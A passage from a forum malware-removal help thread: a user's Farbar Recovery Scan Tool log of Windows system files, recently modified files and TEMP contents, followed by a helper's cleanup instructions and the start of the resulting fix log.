2015-03-10 23:16 - 2015-01-29 18:08 - 00346112 _____ (Microsoft Corporation) C:\WINDOWS\system32\eappcfg.dll
2015-03-10 23:16 - 2015-01-29 18:06 - 00278016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eappcfg.dll
2015-03-10 23:16 - 2015-01-28 18:58 - 00347136 _____ (Microsoft Corporation) C:\WINDOWS\system32\photowiz.dll
2015-03-10 23:16 - 2015-01-28 18:29 - 00290816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\photowiz.dll
2015-03-10 23:16 - 2015-01-28 18:11 - 00274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.TestingFramework.dll
2015-03-10 23:16 - 2015-01-28 18:04 - 01091072 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll
2015-03-10 23:16 - 2015-01-28 18:04 - 00864256 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32spl.dll
2015-03-10 23:16 - 2015-01-28 18:00 - 00210944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.TestingFramework.dll
2015-03-10 23:16 - 2015-01-28 17:59 - 02773504 _____ (Microsoft Corporation) C:\WINDOWS\system32\authui.dll
2015-03-10 23:16 - 2015-01-28 17:55 - 00971776 _____ (Microsoft Corporation) C:\WINDOWS\system32\WSShared.dll
2015-03-10 23:16 - 2015-01-28 17:50 - 00811008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WSShared.dll
2015-03-10 23:16 - 2015-01-28 17:49 - 02459136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\authui.dll
2015-03-10 23:16 - 2015-01-27 19:24 - 00075264 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorageContextHandler.dll
2015-03-10 23:16 - 2015-01-27 18:47 - 00060928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StorageContextHandler.dll
2015-03-10 23:16 - 2015-01-27 16:47 - 02501368 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2015-03-10 23:16 - 2015-01-27 16:41 - 02207488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2015-03-10 23:16 - 2015-01-23 00:17 - 00723072 _____ (Microsoft Corporation) C:\WINDOWS\system32\SHCore.dll
2015-03-10 23:16 - 2015-01-22 22:02 - 00560392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SHCore.dll
2015-03-10 23:16 - 2014-12-10 22:36 - 00046456 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockScreenContentServer.exe
2015-03-10 23:16 - 2014-10-28 19:46 - 00081920 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BTHUSB.SYS
2015-03-10 23:16 - 2014-10-28 19:46 - 00053248 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthenum.sys
2015-03-10 23:16 - 2014-10-28 19:45 - 01198080 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthport.sys
2015-03-10 23:16 - 2014-10-28 19:43 - 00062976 _____ (Microsoft Corporation) C:\WINDOWS\system32\printui.exe
2015-03-10 23:16 - 2014-10-28 19:34 - 00309760 _____ (Microsoft Corporation) C:\WINDOWS\system32\compstui.dll
2015-03-10 23:16 - 2014-10-28 19:34 - 00084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\WSCollect.exe
2015-03-10 23:16 - 2014-10-28 19:34 - 00079872 _____ (Microsoft Corporation) C:\WINDOWS\system32\WSReset.exe
2015-03-10 23:16 - 2014-10-28 19:04 - 00066048 _____ (Microsoft Corporation) C:\WINDOWS\system32\findnetprinters.dll
2015-03-10 23:16 - 2014-10-28 19:03 - 00241152 ____C (Microsoft Corporation) C:\WINDOWS\system32\fsquirt.exe
2015-03-10 23:16 - 2014-10-28 18:58 - 00061952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\printui.exe
2015-03-10 23:16 - 2014-10-28 18:52 - 00289280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\compstui.dll
2015-03-10 23:16 - 2014-10-28 18:51 - 00477184 _____ (Microsoft Corporation) C:\WINDOWS\system32\puiobj.dll
2015-03-10 23:16 - 2014-10-28 18:45 - 00221184 _____ (Microsoft Corporation) C:\WINDOWS\system32\prnntfy.dll
2015-03-10 23:16 - 2014-10-28 18:28 - 00055808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\findnetprinters.dll
2015-03-10 23:16 - 2014-10-28 18:28 - 00048128 _____ (Microsoft Corporation) C:\WINDOWS\system32\atlthunk.dll
2015-03-10 23:16 - 2014-10-28 18:20 - 00367104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\puiobj.dll
2015-03-10 23:16 - 2014-10-28 18:19 - 00070656 _____ (Microsoft Corporation) C:\WINDOWS\system32\eappprxy.dll
2015-03-10 23:16 - 2014-10-28 18:15 - 00199168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\prnntfy.dll
2015-03-10 23:16 - 2014-10-28 18:13 - 00315392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.dll
2015-03-10 23:16 - 2014-10-28 17:59 - 00056320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eappprxy.dll
2015-03-10 23:16 - 2014-10-28 17:55 - 00223744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.dll
2015-03-10 23:16 - 2014-10-28 17:55 - 00192512 _____ (Microsoft Corporation) C:\WINDOWS\system32\puiapi.dll
2015-03-10 23:16 - 2014-10-28 17:44 - 00167424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\puiapi.dll
2015-03-10 23:16 - 2014-10-28 17:41 - 00269312 _____ (Microsoft Corporation) C:\WINDOWS\system32\DafPrintProvider.dll
2015-03-10 23:16 - 2014-10-28 17:35 - 00203776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DafPrintProvider.dll
2015-03-10 21:27 - 2015-03-05 19:53 - 00430080 _____ (Microsoft Corporation) C:\WINDOWS\system32\schannel.dll
2015-03-10 21:27 - 2015-03-05 19:33 - 00358912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\schannel.dll
2015-03-10 21:27 - 2015-02-25 16:26 - 04178944 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys
2015-03-10 21:27 - 2015-02-20 18:16 - 25021440 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2015-03-10 21:27 - 2015-02-20 17:41 - 12827648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2015-03-10 21:27 - 2015-02-20 17:27 - 00285696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtrans.dll
2015-03-10 21:27 - 2015-02-20 17:27 - 00128000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iepeers.dll
2015-03-10 21:27 - 2015-02-20 17:25 - 19720192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2015-03-10 21:27 - 2015-02-20 16:58 - 00092160 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll
2015-03-10 21:27 - 2015-02-20 16:32 - 00076288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll
2015-03-10 21:27 - 2015-02-19 20:03 - 00358912 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll
2015-03-10 21:27 - 2015-02-19 19:58 - 00044032 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll
2015-03-10 21:27 - 2015-02-19 19:49 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2015-03-10 21:27 - 2015-02-19 19:48 - 02886144 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2015-03-10 21:27 - 2015-02-19 19:47 - 00088064 _____ (Microsoft Corporation) C:\WINDOWS\system32\MshtmlDac.dll
2015-03-10 21:27 - 2015-02-19 19:35 - 00816128 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll
2015-03-10 21:27 - 2015-02-19 19:34 - 00814080 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9diag.dll
2015-03-10 21:27 - 2015-02-19 19:32 - 06035456 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2015-03-10 21:27 - 2015-02-19 19:20 - 00301056 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll
2015-03-10 21:27 - 2015-02-19 19:15 - 00035840 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll
2015-03-10 21:27 - 2015-02-19 19:09 - 00503296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2015-03-10 21:27 - 2015-02-19 19:07 - 00145408 _____ (Microsoft Corporation) C:\WINDOWS\system32\iepeers.dll
2015-03-10 21:27 - 2015-02-19 19:06 - 00064000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MshtmlDac.dll
2015-03-10 21:27 - 2015-02-19 19:05 - 00316928 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtrans.dll
2015-03-10 21:27 - 2015-02-19 19:03 - 02278400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2015-03-10 21:27 - 2015-02-19 18:59 - 01032704 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcomm.dll
2015-03-10 21:27 - 2015-02-19 18:56 - 00664064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll
2015-03-10 21:27 - 2015-02-19 18:52 - 00262144 _____ (Microsoft Corporation) C:\WINDOWS\system32\webcheck.dll
2015-03-10 21:27 - 2015-02-19 18:49 - 00801280 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2015-03-10 21:27 - 2015-02-19 18:49 - 00374272 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2015-03-10 21:27 - 2015-02-19 18:46 - 02125824 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2015-03-10 21:27 - 2015-02-19 18:43 - 14398976 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2015-03-10 21:27 - 2015-02-19 18:30 - 04300288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2015-03-10 21:27 - 2015-02-19 18:30 - 00880128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcomm.dll
2015-03-10 21:27 - 2015-02-19 18:29 - 02865152 _____ (Microsoft Corporation) C:\WINDOWS\system32\actxprxy.dll
2015-03-10 21:27 - 2015-02-19 18:28 - 02358784 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2015-03-10 21:27 - 2015-02-19 18:26 - 00230400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webcheck.dll
2015-03-10 21:27 - 2015-02-19 18:24 - 02052608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
2015-03-10 21:27 - 2015-02-19 18:24 - 00689152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2015-03-10 21:27 - 2015-02-19 18:16 - 01548288 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2015-03-10 21:27 - 2015-02-19 18:03 - 00800768 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll
2015-03-10 21:27 - 2015-02-19 18:01 - 01888256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2015-03-10 21:27 - 2015-02-19 17:57 - 01311232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2015-03-10 21:27 - 2015-02-19 17:55 - 00710144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll
2015-03-10 21:27 - 2015-02-12 10:40 - 22291584 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2015-03-10 21:27 - 2015-02-12 10:34 - 19731824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2015-03-10 21:27 - 2015-01-30 16:20 - 00203264 _____ (Microsoft Corporation) C:\WINDOWS\system32\ubpm.dll
2015-03-10 21:27 - 2015-01-29 11:45 - 01763352 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll
2015-03-10 21:27 - 2015-01-29 11:34 - 01488040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll
2015-03-10 21:27 - 2015-01-28 08:41 - 07472960 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2015-03-10 21:27 - 2015-01-28 08:41 - 01733440 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2015-03-10 21:27 - 2015-01-28 08:41 - 01498360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2015-03-10 21:27 - 2015-01-27 18:31 - 00402432 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMPhoto.dll
2015-03-10 21:27 - 2015-01-27 18:11 - 00357376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMPhoto.dll
2015-03-10 21:27 - 2015-01-26 21:22 - 00131584 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll
2015-03-10 21:27 - 2015-01-26 19:11 - 03547648 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcorets.dll
2015-03-10 21:27 - 2015-01-20 22:54 - 01384712 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll
2015-03-10 21:27 - 2015-01-20 22:15 - 01123848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll
2015-03-10 21:27 - 2014-10-28 20:56 - 00027456 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rdpvideominiport.sys
2015-03-10 21:27 - 2014-10-28 19:49 - 00003072 _____ (Microsoft Corporation) C:\WINDOWS\system32\lpk.dll
2015-03-10 21:27 - 2014-10-28 19:44 - 00096256 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontsub.dll
2015-03-10 21:27 - 2014-10-28 19:44 - 00014848 _____ (Microsoft Corporation) C:\WINDOWS\system32\dciman32.dll
2015-03-10 21:27 - 2014-10-28 19:37 - 00040448 _____ (Microsoft Corporation) C:\WINDOWS\system32\rfxvmt.dll
2015-03-10 21:27 - 2014-10-28 19:04 - 00003072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\lpk.dll
2015-03-10 21:27 - 2014-10-28 19:00 - 00077824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontsub.dll
2015-03-10 21:27 - 2014-10-28 19:00 - 00011776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dciman32.dll

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2015-04-06 22:18 - 2013-11-02 23:33 - 00000924 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2015-04-06 22:17 - 2014-02-18 23:43 - 00495104 ___SH () C:\Users\User\Desktop\Thumbs.db
2015-04-06 22:15 - 2013-09-29 21:04 - 01513698 _____ () C:\WINDOWS\system32\PerfStringBackup.INI
2015-04-06 22:15 - 2013-07-30 11:55 - 00491784 _____ () C:\WINDOWS\system32\prfh0404.dat
2015-04-06 22:15 - 2013-07-30 11:55 - 00151910 _____ () C:\WINDOWS\system32\prfc0404.dat
2015-04-06 22:14 - 2013-10-26 01:53 - 00003598 _____ () C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-2601788436-2821952545-4294816460-1002
2015-04-06 22:12 - 2014-04-23 23:09 - 00000000 ____D () C:\Users\User\AppData\Local\CrashDumps
2015-04-06 22:10 - 2013-11-01 19:02 - 01445154 _____ () C:\WINDOWS\WindowsUpdate.log
2015-04-06 22:09 - 2013-11-02 23:33 - 00000920 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2015-04-06 22:09 - 2013-11-01 19:16 - 00000000 ___DO () C:\Users\User\SkyDrive
2015-04-06 22:09 - 2013-08-22 07:46 - 00593356 _____ () C:\WINDOWS\setupact.log
2015-04-06 22:09 - 2013-08-22 07:45 - 00000006 ____H () C:\WINDOWS\Tasks\SA.DAT
2015-04-06 22:08 - 2014-12-31 11:13 - 00000000 ____D () C:\Program Files (x86)\Super Radio
2015-04-06 22:08 - 2014-12-31 11:13 - 00000000 ____D () C:\Program Files (x86)\globalUpdate
2015-04-06 22:08 - 2014-12-31 11:13 - 00000000 ____D () C:\Program Files (x86)\0a1c1a41-5084-4b11-9f5e-84411f0df977
2015-04-06 22:08 - 2013-09-29 20:55 - 00151322 _____ () C:\WINDOWS\PFRO.log
2015-04-06 22:08 - 2013-08-22 06:25 - 00262144 ___SH () C:\WINDOWS\system32\config\BBI
2015-04-06 22:08 - 2013-07-22 10:57 - 00000000 ____D () C:\ProgramData\NVIDIA
2015-04-06 22:00 - 2013-08-22 08:36 - 00000000 ____D () C:\WINDOWS\system32\sru
2015-04-06 21:46 - 2013-10-31 20:20 - 00000000 ____D () C:\Users\User\AppData\Roaming\ClassicShell
2015-04-06 21:37 - 2014-08-13 20:12 - 00000000 ____D () C:\Users\User\AppData\Local\Adobe
2015-04-06 21:36 - 2013-12-31 18:03 - 00000000 ____D () C:\Users\User\Desktop\Utilities
2015-04-06 21:25 - 2013-11-01 10:46 - 00000830 _____ () C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2015-04-05 21:18 - 2013-11-02 23:33 - 00002210 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2015-04-04 00:16 - 2013-11-02 13:43 - 00000000 ____D () C:\Users\User\AppData\Roaming\vlc
2015-04-03 21:58 - 2012-07-26 00:59 - 00000000 ____D () C:\WINDOWS\CbsTemp
2015-03-30 23:48 - 2013-11-01 10:47 - 00000000 ____D () C:\Program Files (x86)\Steam
2015-03-30 23:42 - 2013-11-01 19:02 - 00000000 ____D () C:\Program Files\NVIDIA Corporation
2015-03-30 23:42 - 2013-11-01 19:02 - 00000000 ____D () C:\Program Files (x86)\NVIDIA Corporation
2015-03-30 23:30 - 2013-11-29 11:15 - 00001404 _____ () C:\Users\Public\Desktop\GeForce Experience.lnk
2015-03-30 23:20 - 2013-07-22 10:49 - 00000000 ____D () C:\WINDOWS\SysWOW64\sda
2015-03-30 23:20 - 2013-07-22 10:43 - 00000000 ____D () C:\Program Files (x86)\Realtek
2015-03-30 20:16 - 2013-11-01 10:12 - 00000000 ____D () C:\Program Files (x86)\Mozilla Maintenance Service
2015-03-29 23:57 - 2013-12-21 14:05 - 00000000 ____D () C:\Users\User\AppData\Roaming\foobar2000
2015-03-27 20:44 - 2014-07-30 23:13 - 01316000 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvspbridge.dll
2015-03-27 20:44 - 2013-11-29 11:14 - 01316000 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvspcap.dll
2015-03-27 20:43 - 2014-07-30 23:13 - 01756424 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvspbridge64.dll
2015-03-27 20:43 - 2013-11-29 11:14 - 01570672 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvspcap64.dll
2015-03-22 00:07 - 2015-03-05 00:39 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\H&R Block 2014
2015-03-15 16:46 - 2013-08-22 08:36 - 00000000 ____D () C:\WINDOWS\rescache
2015-03-15 16:25 - 2013-08-22 08:36 - 00000000 ___RD () C:\WINDOWS\ToastData
2015-03-15 16:25 - 2013-08-22 08:36 - 00000000 ___RD () C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools
2015-03-15 16:25 - 2013-08-22 08:36 - 00000000 ___RD () C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools
2015-03-15 16:25 - 2013-08-22 08:36 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories
2015-03-15 16:25 - 2013-08-22 08:36 - 00000000 ____D () C:\WINDOWS\WinStore
2015-03-15 16:25 - 2013-08-22 08:36 - 00000000 ____D () C:\WINDOWS\SysWOW64\zh-HK
2015-03-15 16:25 - 2013-08-22 08:36 - 00000000 ____D () C:\WINDOWS\system32\zh-HK
2015-03-15 16:25 - 2013-08-22 08:36 - 00000000 ____D () C:\Program Files\Windows Defender
2015-03-15 16:25 - 2013-08-22 08:36 - 00000000 ____D () C:\Program Files (x86)\Windows Defender
2015-03-15 16:25 - 2013-08-22 07:44 - 05027712 _____ () C:\WINDOWS\system32\FNTCACHE.DAT
2015-03-13 12:41 - 2013-12-02 19:28 - 14121624 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvd3dum.dll
2015-03-13 12:41 - 2013-12-02 19:28 - 03303448 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvapi64.dll
2015-03-13 12:41 - 2013-12-02 19:28 - 00997856 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvumdshimx.dll
2015-03-13 12:41 - 2013-12-02 19:28 - 00878328 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvumdshim.dll
2015-03-13 12:41 - 2013-12-02 19:28 - 00354112 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvoglshim64.dll
2015-03-13 12:41 - 2013-12-02 19:28 - 00178512 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvinitx.dll
2015-03-13 12:41 - 2013-12-02 19:28 - 00164568 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvinit.dll
2015-03-13 12:41 - 2013-12-02 19:28 - 00027441 _____ () C:\WINDOWS\system32\nvinfo.pb
2015-03-13 09:16 - 2013-12-02 19:30 - 06861968 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcpl.dll
2015-03-13 09:16 - 2013-12-02 19:30 - 03526856 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvsvc64.dll
2015-03-13 09:16 - 2013-12-02 19:30 - 02559808 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvsvcr.dll
2015-03-13 09:16 - 2013-12-02 19:30 - 01099408 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nv3dappshext.dll
2015-03-13 09:16 - 2013-12-02 19:30 - 00935056 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvvsvc.exe
2015-03-13 09:16 - 2013-12-02 19:30 - 00386248 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvmctray.dll
2015-03-13 09:16 - 2013-12-02 19:30 - 00075976 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nv3dappshextr.dll
2015-03-13 09:16 - 2013-12-02 19:30 - 00062608 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvshext.dll
2015-03-11 06:10 - 2013-12-02 19:30 - 04246327 _____ () C:\WINDOWS\system32\nvcoproc.bin
2015-03-10 23:25 - 2013-11-03 18:05 - 00000000 ____D () C:\ProgramData\Microsoft Help
2015-03-10 23:24 - 2013-10-26 02:42 - 00000000 ____D () C:\WINDOWS\system32\MRT
2015-03-10 23:21 - 2013-10-26 02:42 - 122905848 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe

==================== Files in the root of some directories =======

2014-02-19 00:07 - 2014-02-19 00:07 - 0000132 _____ () C:\Users\User\AppData\Roaming\Adobe GIF Format CS6 Prefs
2014-02-18 23:57 - 2015-01-18 22:51 - 0000132 _____ () C:\Users\User\AppData\Roaming\Adobe PNG Format CS6 Prefs
2014-01-17 02:01 - 2014-03-03 00:03 - 0000578 _____ () C:\Users\User\AppData\Roaming\burnaware.ini
2015-03-31 01:14 - 2015-03-31 01:14 - 0004387 _____ () C:\Users\User\AppData\Roaming\oHBfPuiYh
2013-12-05 01:50 - 2013-12-05 01:50 - 0000092 _____ () C:\Users\User\AppData\Local\fusioncache.dat
2013-10-26 01:48 - 2014-09-02 23:50 - 0007633 _____ () C:\Users\User\AppData\Local\resmon.resmoncfg
2013-11-01 19:02 - 2013-11-01 19:02 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
2014-02-21 08:42 - 2014-06-23 00:10 - 0006682 _____ () C:\ProgramData\hpzinstall.log
2014-02-06 19:54 - 2014-02-06 22:20 - 0000298 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc
2014-11-26 20:13 - 2014-11-26 20:13 - 0000105 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.400.64.bc

Some content of TEMP:
====================
C:\Users\User\AppData\Local\Temp\AdobeApplicationManager.exe
C:\Users\User\AppData\Local\Temp\AskSLib.dll
C:\Users\User\AppData\Local\Temp\AutoUpdate.exe
C:\Users\User\AppData\Local\Temp\COMAP.EXE
C:\Users\User\AppData\Local\Temp\drm_dialogs.dll
C:\Users\User\AppData\Local\Temp\drm_dyndata_7340014.dll
C:\Users\User\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpoqom_e.dll
C:\Users\User\AppData\Local\Temp\jre-7u51-windows-i586-iftw.exe
C:\Users\User\AppData\Local\Temp\jre-7u71-windows-i586-iftw.exe
C:\Users\User\AppData\Local\Temp\JuniperSetupClientInstaller.exe
C:\Users\User\AppData\Local\Temp\LMkRstPt.exe
C:\Users\User\AppData\Local\Temp\nv3DVStreaming.dll
C:\Users\User\AppData\Local\Temp\nvSCPAPI.dll
C:\Users\User\AppData\Local\Temp\nvSCPAPI64.dll
C:\Users\User\AppData\Local\Temp\nvStereoApiI.dll
C:\Users\User\AppData\Local\Temp\nvStInst.exe
C:\Users\User\AppData\Local\Temp\OfficeSetup.exe
C:\Users\User\AppData\Local\Temp\ose00000.exe
C:\Users\User\AppData\Local\Temp\P2PStatReport.dll
C:\Users\User\AppData\Local\Temp\pi5lpuuv.dll
C:\Users\User\AppData\Local\Temp\sonarinst.exe
C:\Users\User\AppData\Local\Temp\vlc-2.1.1-win32.exe
C:\Users\User\AppData\Local\Temp\vlc-2.1.2-win32.exe
C:\Users\User\AppData\Local\Temp\vlc-2.1.3-win32.exe
C:\Users\User\AppData\Local\Temp\vlc-2.1.5-win32.exe
C:\Users\User\AppData\Local\Temp\vsdel.exe
C:\Users\User\AppData\Local\Temp\xReflect.exe


==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2015-03-26 22:21

==================== End Of Log ============================

Edited by ah_hin, 07 April 2015 - 01:00 AM.


BC AdBot (Login to Remove)

 


#2 ah_hin

ah_hin
  • Topic Starter

  • Members
  • 61 posts
  • OFFLINE
  •  
  • Local time:08:16 AM

Posted 07 April 2015 - 12:59 AM

I am having a hard time clicking the "Post" or "Edit" buttons, sorry about the confusion, but this malware is hard to bypass....

Edited by ah_hin, 07 April 2015 - 01:10 AM.


#3 B-boy/StyLe/

B-boy/StyLe/

    Bleepin' Freestyler


  • Malware Response Team
  • 8,307 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bulgaria
  • Local time:07:16 PM

Posted 07 April 2015 - 02:50 AM

Hello! Welcome to BleepingComputer Forums! :welcome:
My name is Georgi and and I will be helping you with your computer problems.

Before we begin, please note the following:

  • I will working be on your Malware issues, this may or may not, solve other issues you have with your machine.
  • The logs can take some time to research, so please be patient with me.
  • Stay with the topic until I tell you that your system is clean. Missing symptoms does not mean that everything is okay.
  • Instructions that I give are for your system only!
  • Please do not run any tools until requested ! The reason for this is so I know what is going on with the machine at any time. Some programs can interfere with others and hamper the recovery process.
  • Please perform all steps in the order received. If you can't understand something don't hesitate to ask.
  • Again I would like to remind you to make no further changes to your computer unless I direct you to do so. I will not help you if you do not follow my instructions.

 

 

Let me check something.

 

Next please download the following file => and save it to the Desktop.
NOTE. It's important that both files, FRST and fixlist.txt are in the same location or the fix will not work.

Run FRST and press the Fix button just once and wait.
The tool will make a log on the Desktop (Fixlog.txt). Please post it to your reply.

 

 

Regards,

Georgi


cXfZ4wS.png


#4 ah_hin

ah_hin
  • Topic Starter

  • Members
  • 61 posts
  • OFFLINE
  •  
  • Local time:08:16 AM

Posted 07 April 2015 - 11:57 PM

Hi Georgi, thanks for helping me out!
Here is the fixlog.txt, does it matter that these files are inside a folder on the desktop?

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 11-03-2015
Ran by User at 2015-04-07 21:55:02 Run:1
Running from C:\Users\User\Desktop\Malware software
Loaded Profiles: User & (Available profiles: User)
Boot Mode: Normal
==============================================

Content of fixlist:
*****************
Folder: C:\Program Files (x86)\Mozilla Firefox\browser\defaults
Folder: C:\Program Files (x86)\Mozilla Firefox\defaults\pref
cmd: type "C:\Program Files (x86)\Mozilla Firefox\my.cfg"
*****************


========================= Folder: C:\Program Files (x86)\Mozilla Firefox\browser\defaults ========================

2015-04-06 20:18 - 2015-04-06 20:18 - 0000000 ____D () C:\Program Files (x86)\Mozilla Firefox\browser\defaults\preferences
